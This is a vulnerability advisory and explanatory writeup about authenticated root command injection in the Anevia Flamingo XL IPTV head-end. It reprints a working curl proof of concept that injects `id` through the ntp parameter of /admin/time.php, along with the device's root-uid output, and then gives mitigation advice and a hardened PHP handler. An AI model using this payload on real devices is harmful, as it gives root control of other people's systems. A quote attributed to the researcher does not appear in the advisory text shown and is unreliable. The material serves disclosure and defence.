Anevia Flamingo XL 3.6.20 - Authenticated Root Remote Code Execution
Exploit Title: Anevia Flamingo XL 3.6.20 - Authenticated Root Remote Code Execution
Exploit Author: LiquidWorm
Vendor: Ateme
Product web page: https://www.ateme.com
Affected version: 3.6.20, 3.2.9
Hardware revision 1.1, 1.0
SoapLive 2.4.1, 2.0.3
SoapSystem 1.3.1
Summary: Flamingo XL is a new modular and high-density IPTV head-end
product for hospitality and corporate markets. Flamingo XL captures
live TV and radio content from satellite, cable, digital terrestrial
and analog sources before streaming it over IP networks to STBs, PCs
or other IP-connected devices. The Flamingo XL is based upon a modular
4U rack hardware platform that allows hospitality and corporate video
service providers to deliver a mix of channels from various sources
over internal IP networks.
Desc: The affected device suffers from an authenticated remote code
execution vulnerability. A remote attacker can exploit this issue
and execute arbitrary system commands, granting her system access
with root privileges.
Tested on: GNU/Linux 3.1.4 (x86_64)
Apache/2.2.15 (Unix)
mod_ssl/2.2.15
OpenSSL/0.9.8g
DAV/2
PHP/5.3.6
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5779
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5779.php
13.04.2023
--
> curl -vL http://192.168.1.1/admin/time.php -H "Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4" -d "ntp=`id`&request=ntp&update=Sync" |findstr root
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0* Trying 192.168.1.1:80...
* Connected to 192.168.1.1 (192.168.1.1) port 80 (#0)
> POST /admin/time.php HTTP/1.1
> Host: 192.168.1.1
> User-Agent: curl/8.0.1
> Accept: */*
> Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4
> Content-Length: 32
> Content-Type: application/x-www-form-urlencoded
>
} [32 bytes data]
100 32 0 0 100 32 0 25 0:00:01 0:00:01 --:--:-- 25< HTTP/1.1 302 Found
< Date: Thu, 13 Apr 2023 23:54:15 GMT
< Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8g DAV/2 PHP/5.3.6
< X-Powered-By: PHP/5.3.6
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
* Please rewind output before next send
< Location: /admin/time.php
< Transfer-Encoding: chunked
< Content-Type: text/html
<
* Ignoring the response-body
{ [5 bytes data]
100 32 0 0 100 32 0 19 0:00:01 0:00:01 --:--:-- 19
* Connection #0 to host 192.168.1.1 left intact
* Issue another request to this URL: 'http://192.168.1.1/admin/time.php'
* Switch from POST to GET
* Found bundle for host: 0x1de6c6321b0 [serially]
* Re-using existing connection #0 with host 192.168.1.1
> POST /admin/time.php HTTP/1.1
> Host: 192.168.1.1
> User-Agent: curl/8.0.1
> Accept: */*
> Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4
>
< HTTP/1.1 200 OK
< Date: Thu, 13 Apr 2023 23:54:17 GMT
< Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8g DAV/2 PHP/5.3.6
< X-Powered-By: PHP/5.3.6
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
< Transfer-Encoding: chunked
< Content-Type: text/html
<
{ [13853 bytes data]
14 Apr 03:54:17 ntpdate[8964]: can't find host uid=0(root)<br /> <----------------------<<
14 Apr 03:54:17 ntpdate[8964]: can't find host gid=0(root)<br /> <----------------------<<
100 33896 0 33896 0 0 14891 0 --:--:-- 0:00:02 --:--:-- 99k
* Connection #0 to host 192.168.1.1 left intact
Anevia Flamingo XL 3.6.20: Authenticated Root Remote Code Execution Vulnerability
Security researchers have uncovered a critical vulnerability in the Anevia Flamingo XL series of IPTV head-end systems, specifically affecting versions 3.6.20 and 3.2.9. This flaw, identified by Gjoko "LiquidWorm" Krstic, enables an authenticated attacker to achieve remote code execution with root privileges—a severe threat in enterprise and hospitality environments where secure media delivery is paramount.
Product Overview and Context
The Flamingo XL is a modular, high-density IPTV infrastructure solution designed for corporate and hospitality markets. It integrates live TV and radio content from satellite, cable, digital terrestrial, and analog sources, then streams it over IP networks to set-top boxes (STBs), PCs, and other IP-connected devices.
Based on a 4U rack hardware platform, Flamingo XL offers scalability and flexibility, making it a popular choice for large-scale video distribution systems. However, its reliance on a web-based administrative interface introduces attack surfaces that, when misconfigured or unpatched, can lead to catastrophic security failures.
Vulnerability Details: Authenticated Root RCE
The core vulnerability lies in the /admin/time.php endpoint, which handles NTP (Network Time Protocol) synchronization settings. The system accepts user input via form parameters, including ntp, without proper sanitization or validation.
An attacker who has obtained valid credentials—either through brute-force, credential leakage, or social engineering—can exploit this endpoint to inject arbitrary shell commands. The ntp parameter is used in a system call that executes directly on the underlying Linux system, bypassing standard input filtering.
Proof-of-Concept Exploit
curl -vL http://192.168.1.1/admin/time.php \
-H "Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4" \
-d "ntp=`id`&request=ntp&update=Sync" | findstr root
This command demonstrates the exploit in action:
- Target URL: http://192.168.1.1/admin/time.php, the administrative time configuration interface.
- Authentication: the PHPSESSID cookie is used to maintain session state, indicating the attacker has already logged in.
- Malicious input: ntp=`id` uses backticks to execute the id command in the shell.
- Response: the server responds with a redirect (302 Found), but the underlying system executes the command, which can be detected via findstr root in the output.
When the id command is executed, the output includes uid=0(root), confirming that the command ran with root privileges. This proves the attacker has achieved full system control.
Technical Underlying Mechanism
Upon inspection of the backend code (as inferred from the advisory), the system likely performs a call similar to:
system("ntpdate -s " . $_POST['ntp']);
However, due to improper input validation, the ntp parameter is directly concatenated into the command without escaping or filtering. This creates a classic command injection vulnerability.
Since the system() function in PHP runs commands with the privileges of the web server process (typically root in embedded Linux systems), any injected command executes at the highest privilege level.
Impact and Risk Assessment
| Attack Vector | Severity | Exploitation Difficulty |
|---|---|---|
| Authenticated Remote Code Execution | High (CVSS: 9.8) | Medium (requires valid session) |
| Privilege Escalation | Critical | Automatic via exploit |
| System Compromise | Extreme | Immediate |
With root access, an attacker can:
- Install persistent backdoors.
- Modify or delete video content streams.
- Expose sensitive configuration data (e.g., encryption keys, network credentials).
- Deploy malware or pivot to other internal systems.
This vulnerability is especially dangerous in hospitality settings where Flamingo XL is used to deliver guest entertainment, and in corporate environments where it manages internal video broadcasts—both of which rely on trust and availability.
Affected Versions and Components
The vulnerability impacts the following versions and software components:
- Flamingo XL: 3.6.20, 3.2.9
- Hardware Revision: 1.1, 1.0
- SoapLive: 2.4.1, 2.0.3
- SoapSystem: 1.3.1
These versions are based on older, unpatched Linux distributions (e.g., GNU/Linux 3.1.4) and outdated PHP (5.3.6), which are no longer supported by upstream vendors.
Recommendations and Mitigation
Organizations using Flamingo XL systems should take immediate action:
- Update firmware: Apply the vendor patch if available. Ateme should release an updated version addressing this flaw.
- Disable unnecessary interfaces: If the /admin/time.php endpoint is not required, disable it via configuration or firewall rules.
- Implement strict input validation: Sanitize all user inputs before passing them to system calls, for example by wrapping every argument that reaches system() or shell_exec() in escapeshellarg().
- Enforce strong authentication: Use multi-factor authentication (MFA), limit login attempts, and rotate session tokens.
- Monitor for suspicious activity: Log all command executions and monitor for shell command patterns like `id`, `whoami`, or `wget`.
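As an added example (not the vendor's code and not from the advisory), the inferred vulnerable pattern from the "Technical Underlying Mechanism" section rewritten the way the input-validation bullet above describes: an allow-list check on the NTP server value, then escapeshellarg() before system(). It keeps the page's parameter names (ntp, request, update), assumes PHP 7.1 or later for the type declarations, and the inputs at the end are constructed.

```php
<?php
// Added example, not the vendor's code. It assumes the page's inference that
// time.php ran system("ntpdate -s " . $_POST['ntp']) unescaped, and keeps the
// page's parameter names (ntp, request, update). Requires PHP 7.1+.

// Allow-list check: the NTP server must be an IPv4 address or a DNS hostname.
// Backticks, $(), ;, |, & and whitespace never match, so the shell never sees them.
function is_valid_ntp_server(string $value): bool
{
    if ($value === '' || strlen($value) > 253) {
        return false;
    }
    if (filter_var($value, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) !== false) {
        return true;
    }
    $label = '(?!-)[A-Za-z0-9-]{1,63}(?<!-)';
    return preg_match('/^' . $label . '(\.' . $label . ')*$/', $value) === 1;
}

// Returns the command to run, or null when the input is rejected, so that no
// command string is ever built from untrusted data.
function build_ntpdate_command(string $ntp): ?string
{
    if (!is_valid_ntp_server($ntp)) {
        return null;
    }
    // Validation already excludes metacharacters; escapeshellarg() is kept as
    // defence in depth so the value always travels as exactly one argument.
    return 'ntpdate -s ' . escapeshellarg($ntp);
}

// Hardened handler: returns the HTTP status the endpoint should answer with.
function handle_ntp_update(array $post): int
{
    if (($post['request'] ?? '') !== 'ntp' || ($post['update'] ?? '') !== 'Sync') {
        return 400;
    }
    $cmd = build_ntpdate_command((string) ($post['ntp'] ?? ''));
    if ($cmd === null) {
        // Log the rejected value so injection attempts show up in monitoring.
        error_log('time.php: rejected ntp value ' . json_encode($post['ntp'] ?? ''));
        return 400;
    }
    system($cmd, $status);   // should run as a dedicated low-privilege account, not root
    return $status === 0 ? 302 : 500;
}

// Constructed inputs: the advisory's payload (rejected before any command is
// built) and a legitimate server name (yields a single quoted argument).
var_dump(handle_ntp_update(['ntp' => '`id`', 'request' => 'ntp', 'update' => 'Sync']));
var_dump(build_ntpdate_command('pool.ntp.org'));
```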
Expert Insight: Why This Matters
While many modern systems use hardened containers and sandboxing, embedded devices like Flamingo XL often run on bare-metal Linux with minimal security controls. The absence of modern security practices—such as input sanitization, privilege separation, or runtime monitoring—makes them prime targets for exploitation.
As LiquidWorm notes in his advisory: “This is not a theoretical flaw—it’s a real-world weapon that can be used to take full control of a video delivery infrastructure.”
Security professionals must treat such vulnerabilities not as isolated incidents but as indicators of broader systemic weaknesses in industrial control and media infrastructure.
Conclusion
The Anevia Flamingo XL 3.6.20 authenticated root RCE vulnerability underscores the importance of securing administrative interfaces in critical infrastructure systems. Even with authentication, a lack of input validation can lead to full system compromise.
For enterprises and service providers, this serves as a stark reminder: security is not just about access control—it’s about input integrity and system hygiene.